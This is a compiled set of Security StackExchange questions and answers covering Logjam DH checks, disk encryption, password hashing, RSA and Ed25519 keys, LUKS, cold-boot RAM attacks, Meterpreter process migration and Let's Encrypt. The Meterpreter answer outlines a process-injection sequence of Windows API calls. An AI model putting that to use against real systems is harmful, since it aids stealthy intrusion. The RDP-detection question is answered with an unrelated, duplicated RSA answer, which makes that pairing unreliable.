is kind of immune to all of this because apparently it never supported DHE cipher suites with anything else than a DSS server certificate, and nobody uses DSS server certificates. Note that ECDHE cipher suites, in which "EC" stands for "elliptic curve", are not at risk here, because: There are no "export" ECDHE cipher suites (ECDHE cipher suites were defined after the US export regulations were considerably lifted). Clients in general support only a few specific curves (usually only two of them, P-256 and P-384) and neither is weak enough to be broken (not now, not in the foreseeable future either). And what about the NSA? The Logjam researchers include some talk about how some "attackers with nation-state resources" could break through 1024-bit DH. This is quite a stretch. In my experience, nation states indeed have a lot of resources and are good at spending it, but that's not the same thing as succeeding at breaking hard crypto. Nevertheless, if you fear that 1024-bit DH is "too weak", go for 2048-bit (this is the recommended one anyway), or ECDHE. Or simply accept that people with overwhelming resources really have overwhelming resources and won't be defeated by a simple modulus size. Those who can spend billions of dollars for cracking machines can also bribe your kids with a few hundreds of dollars to go through your computer files and your wallet.
{ "source": [ "https://security.stackexchange.com/questions/89689", "https://security.stackexchange.com", "https://security.stackexchange.com/users/67595/" ] }
89,773
In response to Logjam I want to prove I've hardened my services. I know that the DH param has to be 2048 bits at least and self generated. But I am unable to find a way to actually check this for something other than an HTTPS site. ( thats I can do here ) I would like to check my other SSL protected services for this as well: Mail (Postfix and Dovecot) SSH VPN Any other I got as far as openssl s_client -starttls smtp -crlf -connect localhost:25 But that yielded: CONNECTED(00000003) depth=3 C = SE, O = ME, OU = Also ME, CN = Me again verify error:num=19:self signed certificate in certificate chain verify return:0 Server certificate -SNIPED SOME VALUES- --- SSL handshake has read 6118 bytes and written 466 bytes --- New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-RSA-AES256-GCM-SHA384 Session-ID: 6EAA8A5B22E8C18E9D0E78A0B08447C8449E9B9543601BC53F57CB2059597754 Session-ID-ctx: Master-Key: <MASTERKEY> Key-Arg : None PSK identity: None PSK identity hint: None SRP username: None Start Time: 1432213909 Timeout : 300 (sec) Verify return code: 19 (self signed certificate in certificate chain) --- 250 DSN How can I test the DH parameters? and what should I watch for to know if I'm at risk?
Do the smoke test: (stolen from OpenSSL blog . (Archived here .)) openssl s_client -connect www.example.com:443 -cipher "EDH" | grep "Server Temp Key" The key should be at least 2048 bits to offer a comfortable security margin comparable to RSA-2048. Connections with keys shorter than 1024 bits may already be in trouble today. (Note: you need OpenSSL 1.0.2. Earlier versions of the client do not display this information.) (If the connections fails straight away, then the server does not support ephemeral Diffie-Hellman ("EDH" in OpenSSL-speak, "DHE" elsewhere) at all and you're safe from Logjam.) [...] Finally, verify that export ciphers are disabled: $ openssl s_client -connect www.example.com:443 -cipher "EXP" The connection should fail. In other words: get OpenSSL 1.0.2. add the -cipher "EDH" option to your connect string. assume vulnerability if export ciphers are enabled on the server assume vulnerability if 512 bit (or anything less than 2048 bit) turns up.
{ "source": [ "https://security.stackexchange.com/questions/89773", "https://security.stackexchange.com", "https://security.stackexchange.com/users/63999/" ] }
89,825
I am having a debate with several people regarding how much protection full disk encryption provides. dm-crypt is being used to encrypt data which is required by my company to be encrypted at rest. The Linux servers hosting the data reside in a secure data center with very little risk of unauthorized physical access, let alone someone actually stealing the server. My argument is that in this situation, that while complying with the letter of the law, they have done little to nothing to actually reduce risk associated with unencrypted data. In effect, from a logical standpoint, they are in the exact same situation than if no encryption had been implemented at all. I am curious though if this train of though is correct, thoughts? To tailor the question more to my specific situation, regarding physical protection, the controls around that are typically very sound. I am not saying risk is eliminated but it is considered to be low. Same with disposal of the drives, the destruction controls operate pretty effectively and risk is considered low. From a logical access standpoint the servers are not Internet facing, are behind a firewall, logical access is well controlled (but many have access), and they are not virtualized. Further, the servers operate 24x7, the only time they are rebooted is if it's needed after a change or during installation of a new one. My concern is that in the event an insider goes rogue, or an unauthorized user exploits a logical security flaw, then the full data encryption does nothing to protect the data versus using some of the other field or file level encryption tools available. Whereas the people I am debating argue that this is not the case.
Two generic things you apparently have missed: In case of disk failure, having the data encrypted at rest solves the issue of having potentially sensitive data on a media you can't access any more. It makes disposing of faulty drives easier and cheaper (and it's one less problem) Full disk encryption also makes it harder for an attacker to retrieve data from the "empty" space on the drives (which often contains trace of previously valid data) And if you're using VMs: Encrypting the partition makes you less dependent on the security of your hypervisor: if somehow the raw content of one of your drive "leaks" to another VM (which could happen if the drive space is reallocated to another VM and not zeroed out), that VM will be less likely to have access to the actual data (it would need to obtain the decryption key as well).
{ "source": [ "https://security.stackexchange.com/questions/89825", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76061/" ] }
89,844
An introductory C++ course is offered every year in our university. In order for students to code in C++ and submit their assignments, we give them shell access to a Linux server. They use ssh to log in to the server with their accounts, do the coding and keep the compiled code in their home directories. However, giving shell access brings in a number of vulnerabilities with it. My question is, Is there any other way, apart from giving shell access to students, in which we can fulfil the above mentioned purpose? Any server side tool/application that can provide an interface to students for doing their c++ assignments without compromising server security?
What you need is relatively simple: you need to ensure that your students' unprivileged accounts are well confined. If you don't have a graphical environment involved, your situation is relatively simple. You should start by implementing the following actions: ensure users are created without administrative privileges (no sudo , no admin or wheel group) ensure users are unable to emulate a login screen to spoof your login screen (a classic for university, which I've seen happen) ensure proper polkitd policy which prevents users from suspending/shutting down the host ensure you don't run vulnerable/outdated suid / sgid services on the host ( see how to list them ) ensure no individual user can deplete the resources of the system (by configuring Systemd.cgroup to impose resource usage limits on the entire session of each user) strengthen your mandatory access control by installing and configuring properly SELinux (to limit students to a student role where they can only write in their home and in /tmp) expire accounts when necessary to avoid lingering accounts with eventually compromised passwords ( see this question on the Unix site ) you can even run students' sessions in separate containers using Systemd.nspawn which is designed to run fully working systems independently from one another, using Linux namespaces . This is the proper way to jail a session, not chroot You might then notice that students use the machines for other purposes than those allowed. You can limit access to machines to specific times using pam_time though that might get in the way of students getting their work done and should be balanced against the benefits it provides. Also, make sure that your network administrators know what traffic to expect on this host so they can detect undesirable traffic. All of this being said, I don't see the point in white-listing specific binaries (useless since students can compile and run their own code) as it may get in the way of students using legitimate development tools, e.g. alternative compilers, building toolchains, code analysis tools, code versioning tools, etc. As long as users can only harm themselves and you've got strong guarantees of that, the job is done. This isn't exactly a long-term production system anyway, students are only using it to fool around with educational code.
{ "source": [ "https://security.stackexchange.com/questions/89844", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77057/" ] }
90,064
I started reading about password hashing recently on multiple sites like this page on crackstation and others, and for what I have understood, I should avoid using hashing algorithms like md5 and sha1 for they are outdated and instead, I should use sha256 with salt. But, after reading this page on the php manual, I noticed that they discourage the use of even sha256 and instead they recommend using the password_hash() functions. I also noticed that most of this articles/pages were written in the interval of 2011-13, so I am not sure of how secure sha256 hashed password with salts are nowadays and whether or not it should still be used in webapps.
General-purpose hashes have been obsolete for passwords for over a decade. The issue is that they're fast, and passwords have low entropy, meaning brute-force is very easy with any general-purpose hash. You need to use a function which is deliberately slow, like PBKDF2, bcrypt, or scrypt. Crackstation actually explains this if you read the whole page. On the other hand, MD5 and SHA-1 aren't weaker than SHA-2 in the context of password hashing; their weakness is not relevant for passwords.
{ "source": [ "https://security.stackexchange.com/questions/90064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/43741/" ] }
90,077
A lot of people recommend using Ed25519 instead of RSA keys for SSH. The introduction page of Ed25519 ( http://ed25519.cr.yp.to/ ) says: [..] breaking it has similar difficulty to breaking [..] RSA with ~3000-bit keys [..] So speaking only of security (not speed!), why should one not prefer RSA 4096 over Ed25519 ? If Ed25519 only provides ~3000 bit key strength, RSA with 4096 bit should be much more secure?
Key strengths, and their equivalences, become meaningless when they reach the zone of "cannot be broken with existing and foreseeable technology", because there is no such thing as more secure than that. It is a common reflex to try to think of key sizes as providing some sort of security margin, but this kind of reasoning fails beyond some point. Basically, the best known algorithms for breaking RSA, and for breaking elliptic curves, were already known 25 years ago. Since then, breaking efficiency has improved because of faster computers, at a rate which was correctly predicted . It is a tribute to researchers that they could, through a lot of fine tuning, keep up with that rate, as shown on this graph: (extracted from this answer ). The bottom-line is that while a larger key offers longer predictable resistance, this kind of prediction works only as long as technology improvements can be, indeed, predicted, and anybody who claims that he knows what computers will be able to do more than 50 years from now is either a prophet, a madman, a liar, or all of these together. 50 years from now, the optimistic formula given in the answer quoted above ((year - 2000) * 32 + 512) means that, at best , RSA records could contemplate approaching 2592 bits. The conclusion is that there is no meaningful way in which 3000-bit and 4000-bit RSA keys could be compared with each other, from a security point of view. They both are "unbreakable in the foreseeable future". A key cannot be less broken than not broken. An additional and important point is that "permanent" keys in SSH (the keys that you generate and store in files) are used only for signatures . Breaking such a key would allow an attacker to impersonate the server or the client, but not to decrypt a past recorded session (the actual encryption key is derived from an ephemeral Diffie-Hellman key exchange, or an elliptic curve variant thereof). Thus, whether your key could be broken, or not, in the next century has no importance whatsoever. To achieve "ultimate" security (at least, within the context of the computer world), all you need for your SSH key is a key that cannot be broken now , with science and technology as they are known now. Another point of view on the same thing is that your connections can only be as secure as the two endpoints. Nothing constraints your enemies, be they wicked criminals, spies or anything else, to try to defeat you by playing "fair" and trying to break your crypto upfront. Hiring thousands upon thousands of informants to spy on everybody (and on each other) is very expensive, but it has been done , which is a lot more than can be said about breaking a single RSA key of 2048 bits.
{ "source": [ "https://security.stackexchange.com/questions/90077", "https://security.stackexchange.com", "https://security.stackexchange.com/users/60931/" ] }
90,093
Apparently Travel Sentry locks can only be opened: by their owner, by the TSA , CATSA and "other security agencies". How do they work technically? Is there some electronics embedded with authentication capabilities? Do the security agencies have a kind of master code/key? Do they have a big database giving the code for each individual lock? In that case I guess the lock has to emit some kind of identifier? Apparently some have just a code, some other have just a key hole: And some have both, see the pictures on Wikimedia Commons .
They're all master keyed. On each lock you'll see a number ("TSA007" or such) that signifies which key on the ring the TSA agent needs to use to open the lock. It's bad enough that anybody can buy a few of them and disassemble the locks to know exactly which keys to cut (as one could with any keyed-alike lock). The effort to open them is far lower than that, though: they're embarrassingly insecure locks on their own. You can watch somebody in this video pop open 3 locks in a row, each with seconds of effort using the same generic jiggler keys: https://www.youtube.com/watch?v=xtJx3j7AhQk
{ "source": [ "https://security.stackexchange.com/questions/90093", "https://security.stackexchange.com", "https://security.stackexchange.com/users/634/" ] }
90,169
I'm having a problem understanding the size of an RSA public key and its private key pair. I saw different key sizes for RSA algorithm (512, 1024,... for example), but is this the length of public key or the length of private key or are both equal in length? I already searched for it, but: In this question it is mentioned that both private and public keys for RSA algorithm have equal length. But: In this question it is mentioned that they have different lengths! Both answers are accepted. Are they equal or not in length? Moreover my Java Card applet that generate RSA key pairs, always return pubic key and private key of equal length. The online tools for generating RSA key pairs have different length output! Examples: Online tool 1 : Online tool 2 :
> I saw different key sizes for RSA algorithm (512, 1024,... [bits] for example) but, is this the length of public key or the length of private key or both are equal in length? It's the length of the modulus used to compute the RSA key pair. The public key is made of modulus and public exponent, while the private key is made of modulus and private exponent. > but the online tools for generating RSA key pairs have different lengths output! The first picture shows public and private key in PEM format, encoded in Base64 (and not modulus and exponents of the key, which instead are shown in the second picture). The content of the RSA private key is as follows: -----BEGIN RSA PRIVATE KEY----- RSAPrivateKey ::= SEQUENCE { version Version, modulus INTEGER, -- n publicExponent INTEGER, -- e privateExponent INTEGER, -- d prime1 INTEGER, -- p prime2 INTEGER, -- q exponent1 INTEGER, -- d mod (p-1) exponent2 INTEGER, -- d mod (q-1) coefficient INTEGER, -- (inverse of q) mod p otherPrimeInfos OtherPrimeInfos OPTIONAL } -----END RSA PRIVATE KEY----- while a RSA public key contains only the following data: -----BEGIN RSA PUBLIC KEY----- RSAPublicKey ::= SEQUENCE { modulus INTEGER, -- n publicExponent INTEGER -- e } -----END RSA PUBLIC KEY----- and this explains why the private key block is larger. Now, why does the private key contain so much data? After all, only the modulus n and the private exponent d are needed. The reason all the other stuff is precomputed and included in the private key block is to speed up decryption using the Chinese Remainder Algorithm . (Kudos to @dbernard for pointing this out in the comments.) Note that a more standard format for non-RSA public keys is -----BEGIN PUBLIC KEY----- PublicKeyInfo ::= SEQUENCE { algorithm AlgorithmIdentifier, PublicKey BIT STRING } AlgorithmIdentifier ::= SEQUENCE { algorithm OBJECT IDENTIFIER, parameters ANY DEFINED BY algorithm OPTIONAL } -----END PUBLIC KEY----- More info here . BTW, since you just posted a screenshot of the private key I strongly hope it was just for tests :)
{ "source": [ "https://security.stackexchange.com/questions/90169", "https://security.stackexchange.com", "https://security.stackexchange.com/users/50329/" ] }
90,175
How can RDP connections on the network be identified if they are no longer using TCP 3389 and instead using a non-standard port? If the administrator of a system changed the port for remote connections from 3389 to something else and not updated same in IDS or firewall, then how can someone detect the active remote connections at the network level?
> I saw different key sizes for RSA algorithm (512, 1024,... [bits] for example) but, is this the length of public key or the length of private key or both are equal in length? It's the length of the modulus used to compute the RSA key pair. The public key is made of modulus and public exponent, while the private key is made of modulus and private exponent. > but the online tools for generating RSA key pairs have different lengths output! The first picture shows public and private key in PEM format, encoded in Base64 (and not modulus and exponents of the key, which instead are shown in the second picture). The content of the RSA private key is as follows: -----BEGIN RSA PRIVATE KEY----- RSAPrivateKey ::= SEQUENCE { version Version, modulus INTEGER, -- n publicExponent INTEGER, -- e privateExponent INTEGER, -- d prime1 INTEGER, -- p prime2 INTEGER, -- q exponent1 INTEGER, -- d mod (p-1) exponent2 INTEGER, -- d mod (q-1) coefficient INTEGER, -- (inverse of q) mod p otherPrimeInfos OtherPrimeInfos OPTIONAL } -----END RSA PRIVATE KEY----- while a RSA public key contains only the following data: -----BEGIN RSA PUBLIC KEY----- RSAPublicKey ::= SEQUENCE { modulus INTEGER, -- n publicExponent INTEGER -- e } -----END RSA PUBLIC KEY----- and this explains why the private key block is larger. Now, why does the private key contain so much data? After all, only the modulus n and the private exponent d are needed. The reason all the other stuff is precomputed and included in the private key block is to speed up decryption using the Chinese Remainder Algorithm . (Kudos to @dbernard for pointing this out in the comments.) Note that a more standard format for non-RSA public keys is -----BEGIN PUBLIC KEY----- PublicKeyInfo ::= SEQUENCE { algorithm AlgorithmIdentifier, PublicKey BIT STRING } AlgorithmIdentifier ::= SEQUENCE { algorithm OBJECT IDENTIFIER, parameters ANY DEFINED BY algorithm OPTIONAL } -----END PUBLIC KEY----- More info here . BTW, since you just posted a screenshot of the private key I strongly hope it was just for tests :)
{ "source": [ "https://security.stackexchange.com/questions/90175", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77252/" ] }
90,191
A DoS (short for "denial of service") attack is a form of attack used on web services which aims to "crash" the service. Is there any motive of this form of attack besides crashing the service / website? For example, I could think of blackmailing/ doing harm to a competitor / political reasons as a direct motive for DoS attack. But are there other, more indirect motives? Would it be possible to get data from the service with a DoS attack? If so, how?
In general a (Distributed) Denial of Service attack will not provide you with much information directly. However, there are a few scenarios where information could be gleaned as a result of a DoS. The following are a few examples, but this is not at all exhaustive: A load balancer may divulge internal subnet information or leak internal machine names in situations where backing systems are offline. A DoS that shuts down the database first may cause an application reveal the database engine type, connection username, or internal IP address via an error message. A poorly implemented API could result in a "fail-open" scenario--DoS'ing a Single Sign On server may give an attacker the ability to log in unauthenticated, or with local credentials. In Advanced Persistent Threat scenarios, DoS'ing detection infrastructure may allow an attacker to remain undetected during other information-gathering stages. Similarly, DoS'ing the admin interface of a firewall could hinder network administration's incident response efforts. In an extreme case, DoS against a key-revocation service could allow an attacker to continue to use revoked, or known-compromised credentials. Other motives for a Denial of Service attack become apparent if you consider the users of a system as targets in addition to the system itself: A Denial of Service attack against a website that sells concert tickets may allow an attacker to buy tickets to a event that would have otherwise sold out in minutes. A DoS against a version control system could prevent a development company from delivering software on time. A DoS against a social media site could make coordinating political protests more difficult, or event impossible.
{ "source": [ "https://security.stackexchange.com/questions/90191", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3286/" ] }
90,309
I apologize if this is an obvious question, I'm not very familiar with hardware. I am planning on hosting a few personal websites from my home, but I'm concerned about my security. I'm using a fairly old cable router (probably around 10 years old I would guess, it's ASUS RX3041). I was wondering if it would be possible for an attacker to send some malicious packets and gain access to my router or be able to send packets to computers connected to the router on ports that are not mapped, or any other exploit, really. Even if the router was compromised, the server should still be secured with its own firewall and what not but what I want to know is if I can rely on the router as a security layer. Is it reliable to host a website with my current setup?
TL:DR - Yes, routers CAN be vulnerable. Misconfigured/Unconfigured routers - A ton of people just install their routers and leave the default accounts turned on without modification. Thus allowing attackers easy access. Vulnerable built in scripts - http://www.reddit.com/r/netsec/comments/1xy9k6/that_new_linksys_worm/ See: What is the "Moose" worm and how can I protect myself from it? http://www.pcworld.com/article/2899732/at-least-700000-routers-given-to-customers-by-isps-are-vulnerable-to-hacking.html http://www.pcworld.com/article/2464300/fifteen-new-vulnerabilities-reported-during-router-hacking-contest.html http://searchsecurity.techtarget.com/news/4500246976/NetUSB-router-vulnerability-puts-devices-in-jeopardy As for answering whether your 'current setup' is secure. We would need a bit more information about the entire scope of your security onion before being able to answer that.
{ "source": [ "https://security.stackexchange.com/questions/90309", "https://security.stackexchange.com", "https://security.stackexchange.com/users/68834/" ] }
90,350
It seems that most sites or systems will just state Invalid username or password As a means to not reveal usernames for use in brute force (and other) attacks. Seems like a good idea as a general rule. However, many of them you can follow the forgotten password? link and quite often you can get This email address / username isn't registered Should this not follow the same process and not reveal this information? Is it just bad design practice that has become the norm? Edit to add; I'm thinking about a secure system where the users aren't able to self register, nor should the general public have access. So it should be secured to those who have access and that's all.
Yes, it is bad security practice indeed. When using the Forgotten Password feature, the site should respond with a message: "An email has just been sent to the specified email address, if it exists and is registered within our system. Please read the email and follow the instructions." Or simply: "Please check your email inbox for instructions on how to proceed to reset your password" , since it's a safe assumption that the account reset procedure was initiated by the legitimate account owner. EDIT: It has been pointed out that an attacker might find out whether an email address is registered in the system by trying to open an account with that address. To thwart this attack, the registration procedure must be changed too; the user should be allowed to register only after he/she verified his/her email address, as follows. Upon entering an email address for a new registration, the site should respond with the message "An email has been sent to the email address you provided. Please read the email and follow the instructions to complete the registration, if necessary". Then the email message would contain the steps to follow to complete the registration, or a simple warning to the user if the email address was already registered.
{ "source": [ "https://security.stackexchange.com/questions/90350", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73340/" ] }
90,468
I am curious about the following claim from the Cryptsetup FAQ : 2.4 What is the difference between "plain" and LUKS format? First, unless you happen to understand the cryptographic background well, you should use LUKS. It does protect the user from a lot of common mistakes. Plain dm-crypt is for experts. After reading through the manual I can see the benefit of LUKS in particular situations. However, I do NOT see the need to "understand the cryptographic background" to use plain dm-crypt. From reading the manual, I understand that: There are some things done in LUKS (like hashing) that don't happen in plain dm-crypt. The result is that I need a bit more entropy in my passphrase to make it safe. In plain mode you can argue it's easier to accidentally overwrite encrypted data. The second point is not really related to understanding cryptography, and it doesn't seem to require expert cryptography knowledge to prevent this (note that I do agree that this is a risk and it can easily happen, even to the best, but I would just argue that having or not having expert cryptography knowledge does not have much of an impact). So on to the first point. In the same manual the following is stated: 5.12 What about iteration count with plain dm-crypt? Simple: There is none. There is also no salting. If you use plain dm-crypt, the only way to be secure is to use a high entropy passphrase. If in doubt, use LUKS instead. This implies to me that the only thing that is needed to have a secure setup with plain dm-crypt, cryptography wise, is to use a high entropy passphrase (higher than what could be used in LUKS for the same lever of security). Again, it doesn't take rocket science to understand or apply this. Likely, I am not understanding or capturing something important here, but my question is therefore: what is the kind of cryptography knowledge required that makes dm-crypt only recommended to experts ? If I stick to standard operations, and I do not require any of the features from LUKS, what risks am I as a non-expert taking?
If I stick to standard operations, and I do not require any of the features from LUKS, what risks am I as a non-expert taking? LUKS partitions have a header that ensures such a partition won't be seen as ext2, vfat, etc. A plain dm-crypt partition may coincidentally end up looking like a unencrypted filesystem, and has a chance of being written to accidentally, destroying your data. LUKS checks if you entered the correct passphrase. If you put in the wrong passphrase, plain dm-crypt won't pick up on this; instead, it will happily give you garbled crypto-mapping which may also coincidentally look like an unencrypted filesystem, and has a chance of being written to accidentally, destroying your data. LUKS stores the type of encryption used, while dm-crypt requires you to supply the same options each time. If, after a period of not using your encrypted device, you find there are a few gaps in your recollection of what the password was, and it turns out you forgot the encryption options as well, you are doubly hosed (this happened to me personally before LUKS existed; the encrypted data wasn't so important so I just reformatted after unsuccessfully trying to get in for an hour or so). Also, there may have been a period during the development of cryptsetup in which essiv was not the default for dm-crypt, but was for LUKS, and the documentation you are reading may have been intended to allude to that. Finally, some of the options of LUKS do things that are important from a security standpoint. For example, suppose you fall asleep while authenticating with gmail and accidentally type in your drive password. In dm-crypt there is no way to change the password without re-encrypting your whole device (and doing so in-place is risky, since a system crash or power loss event will leave you with a guaranteed hosed system). With LUKS, you can change the password.
{ "source": [ "https://security.stackexchange.com/questions/90468", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9804/" ] }
90,561
The software that our company builds just went through a security audit. The auditors flagged our use of MD5 for hashing passwords that users can set if they want a password on their files. Having looked in to it, it seems that I should replace it with PBKDF2. But to remove all MD5 hashing methods from the software this will mean users will need to temporarily lose all their passwords? As in, we will need to communicate to customers that if they update, all their files will not be password protected? I mean, I can check that an old hash exists and force them to manually set a new password but the password could be set by anyone which seems like kind of a big flaw. If an attacker has access to their file and the new version of our software, they will get access to the file with out password.
This is a common problem. The usual answer is twofold: For users who haven't logged in since the change: use the old hash value as the input for the new hashing scheme. Whenever somebody logs in after the change: Use the new password directly as input for the new hashing scheme. Use an additional column in the new table to indicate how the new hash was calculated. Further reading Hash function change https://stackoverflow.com/questions/14399750/moving-old-passwords-to-new-hashing-algorithm https://stackoverflow.com/questions/8864239/how-to-migrate-passwords-to-a-different-hashing-method https://stackoverflow.com/questions/6469913/how-to-migrate-a-password-hash https://webmasters.stackexchange.com/questions/1062/migrate-user-accounts-out-of-system-with-hashed-passwords
{ "source": [ "https://security.stackexchange.com/questions/90561", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77708/" ] }
90,578
Did anyone try to figure out how process migration works in Meterpreter in Windows? I want to make my own script to learn that, but am failing to find a starting point for that. Well, I have an idea to use NtQuerySystemInformation library and its SystemHandleInformation function, as it can return handle of a thread in the OS and using those I can change its parent, but I doubt that it's going to work (due to TEB). And I have a feeling that there should be an easier way than NtQuerySystemInformation . Could anyone suggest a DLL or an algorithm to use?
This is how migrate works in meterpreter: Get the PID the user wants to migrate into. This is the target process. Check the architecture of the target process whether it is 32 bit or 64 bit. It is important for memory alignment. Check if the meterpreter process has the SeDebugPrivilege. This is used to get a handle to the target process. Further details at http://support.microsoft.com/kb/131065 Get the actual payload from the handler that is going to be injected into the target process. Calculate its length as well. Call the OpenProcess() API to gain access to the virtual memory of the target process. Call the VirtualAllocEx() API to allocate an RWX (Read, Write, Execute) memory in the target process Call the WriteProcessMemory() API to write the payload in the target memory virtual memory space. Call the CreateRemoteThread() API to execute the newly created memory stub having the injected payload in a new thread. Shutdown the previous thread having the initial meterpreter running in the old process.
{ "source": [ "https://security.stackexchange.com/questions/90578", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77713/" ] }
90,697
Both my boot partition and my data partition are encrypted with TrueCrypt. My password is lengthy, so I find myself avoiding a reboot of my system whenever possible. When going to lunch (for instance), I have been putting my laptop into "Sleep" mode, which requires me to enter my Windows password to get back into Windows. (My Windows password is weak; more to keep the kids out of my account than anything else.) I'm aware of software that can remove Windows passwords easily, but I am not aware of a took that can remove a password without rebooting. (If they reboot my machine, they will have to re-enter my TrueCrypt password.) How sophisticated would an adversary have to be to get data from my computer when it is only in "Sleep" mode?
For virtually all disk encryption tools, your encryption key will be stored in RAM while the computer is in use or in sleep mode. This of course presents a fairly significant vulnerability, because if someone can dump the contents of your RAM while keeping its contents intact, it is likely they can extract the key from the RAM dump using widely available commercial software such as Elcomsoft Forensic Disk Decryptor which claims to extract Truecrypt, Bitlocker, and PGP keys. To protect yourself against this, you'll have to make it harder for an attacker to obtain a RAM dump. The easiest way to obtain a RAM dump is by using software programs that come with many forensics toolkits (which are also freely available). However, the catch is that in order to run these programs, they would first have to unlock your computer. If they can't unlock your computer to run programs, they can't launch any RAM dump utilities. For this reason, having a strong Windows lock screen password is important! (Also, just to be realistic and state the obvious, the lock screen password is also important because if an attacker is able to guess it, they could just grab a copy of your files right then and there and not even worry about finding your encryption key. For a run-of-the-mill thief interested in obtaining your data, this would probably be the most realistic threat IMO) A more sophisticated way is to use a cold boot attack ; this takes advantage of the fact that contents of memory will remain there for some time (from a few seconds to a few hours if the RAM is cooled with a refrigerant) even after power is turned off. The attacker can then bypass Windows and boot into a RAM dump utility or physically move the RAM to a different machine for reading. This kind of attack significantly harder to protect against. Lastly I'd also mention that development of Truecrypt stopped a year ago for unknown reasons and it is no longer supported, so I would recommend moving to one of its forks such as Veracrypt .
{ "source": [ "https://security.stackexchange.com/questions/90697", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73051/" ] }
90,842
I have difficulties to pinpoint the difference between attack vector / attack surface / vulnerability and exploit. I think the difference between a vulnerability and an exploit is the following: A vulnerability is something that could get used to do harm (e.g. a buffer overflow), but does not necessarily mean that anything can be done. An exploit makes use of a vulnerability in a "productive" way (e.g. reading the following bytes in memory after triggering an error message). According to Wikipedia (vulnerability) To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface. So attack surface and vulnerability seem to be synonyms in the context of IT security (?) Could anybody please define the words or give examples for the difference between them?
All 4 terms are very different: Describes the Attack: Attack Vector : the 'route' by which an attack was carried out. SQLi is typically carried out using a browser client to the web application. The web application is the attack vector (possibly also the Internet, the client application, etc.; it depends on your focus). Exploit : the method of taking advantage of a vulnerability. The code used to send SQL commands to a web application in order to take advantage of the unsanitized user inputs is an 'exploit'. Describes the Target: Attack Surface : describes how exposed one is to attacks. Without a firewall to limit how many ports are blocked, then your 'attack surface' is all the ports. Blocking all ports but port 80 reduces your 'attack surface' to a single port. Vulnerability : a weakness that exposes risk. Unsantitized user inputs can pose a 'vulnerability' by a SQLi method. We can also look at this from the perspective of a user as the target. An attacker sends an infected PDF as an email attachment to a user. The user opens the PDF, gets infected, and malware is installed. The 'attack vector' was email, the 'exploit' was the code in the PDF, the 'vulnerability' is the weakness in the PDF viewer that allowed for code execution, the 'attack surface' is the user and email system.
{ "source": [ "https://security.stackexchange.com/questions/90842", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3286/" ] }
90,848
I want to encrypt data using AES in java, and I want to intialize the cipher with Initialisation Vector. Can I use 256-bits IV ? Or I must use only 128-bits IV ?
The IV depends on the mode of operation . For most modes (e.g. CBC), the IV must have the same length as the block . AES uses 128-bit blocks, so a 128-bit IV. Note that AES-256 uses a 256-bit key (hence the name), but still with 128-bit blocks. AES was chosen as a subset of the family of block ciphers known as Rijndael . That family includes no less than 15 variants, for three possible block sizes (128, 192 and 256 bits) and five possible key sizes (128, 160, 192, 224 and 256 bits). AES , as standardized by NIST, includes only three variants, all with 128-bit blocks, and with keys of 128, 192 or 256 bits. To further confuse things, some software frameworks got it wrong; e.g. PHP uses "MCRYPT_RIJNDAEL_128" to designate Rijndael with 128-bit keys and 128-bit blocks (i.e. the same thing as AES-128), and "MCRYPT_RIJNDAEL_256" for Rijndael with 256-bit keys and 256-bit blocks (i.e. not one of the AES variants, and in particular not at all AES-256).
{ "source": [ "https://security.stackexchange.com/questions/90848", "https://security.stackexchange.com", "https://security.stackexchange.com/users/75958/" ] }
90,901
I was using Facebook today and, after replying politely to someone about how stupid his comment on something was, Mr. John Doe, who I never met before, sent me this message: You wanna get hacked, huh? In less than 3 minutes I was able to get your dynamic IP, PPPoE and mask (your machine is pretty vulnerable). But stay calm and call your computer technician. Best wishes Can he hack my Facebook account just with that? I think he was bluffing or something. If it helps, I am using a regular DSL wireless router, a desktop computer with a USB Wi-Fi receiver and the machine has Windows 7. By the way, I changed the router administration password as soon as I got the wireless router, months before this happened.
Your IP is a public address and has nothing to do with your Facebook account. Just knowing it does not help someone to 'hack' you. In the same way, knowing your IP does not increase your threat of your computer being hacked. He's blustering.
{ "source": [ "https://security.stackexchange.com/questions/90901", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77984/" ] }
90,972
On the advantages side, I see several benefits to using the Let's Encrypt service (e.g., the service is free, easy to setup, and easy to maintain). I'm wondering what, if any, are the disadvantages to using Let's Encrypt? Any reasons why website operators -- whether big like Twitter or small like a local photographer -- should not consider replacing their existing SSL services with companies like GoDaddy with this service? (If the service is not yet available, this disadvantage can be ignored -- I'm more wondering about disadvantages once it is available for general public use.)
Let's Encrypt is a Certificate Authority, and they have more or less the same privileges and power of any other existing (and larger) certificate authority in the market. As of today, the main objective downside of using a Let's Encrypt certificate is compatibility. This is an issue that any new CA faces when approaching the market. In order for a certificate to be trusted, it must be signed by a certificate that belongs to a trusted CA. In order to be trusted, a CA must have the signing certificate bundled in the browser/OS. A CA that enters the market today, assuming they are approved to the root certificate program of each browser/OS from day 0 (which is impossible), will be included in the current releases of the various browser/OS. However, they won't be able to be included in older (and already released) versions. In other words, if a CA Foo joins the root program on Day 0 when the Google Chrome version is 48 and Max OSX is 10.7, the Foo CA will not be included (and trusted) in any version of Chrome prior to 48 or Mac OSX prior to 10.7. You can't retroactively trust a CA. To limit the compatibility issue, Let's Encrypt got their root certificate cross-signed by another older CA (IdenTrust). This means a client that doesn't include LE root certificate can still fallback to IdenTrust and the certificate will be trusted... in an ideal world. In fact, it looks like there are various cases where this is not currently happening (Java, Windows XP, iTunes and other environments ). Therefore, that's the major downside of using a Let's Encrypt certificate: a reduced compatibility compared to other older competitors. Besides compatibility, other possible downsides are essentially related to the issuance policy of Let's Encrypt and their business decisions. Like any other service, they may not offer some features you need. Here's some notable differences of Let's Encrypt compared to other CAs ( I also wrote an article about them ): LE doesn't currently issue wildcard certificates (they 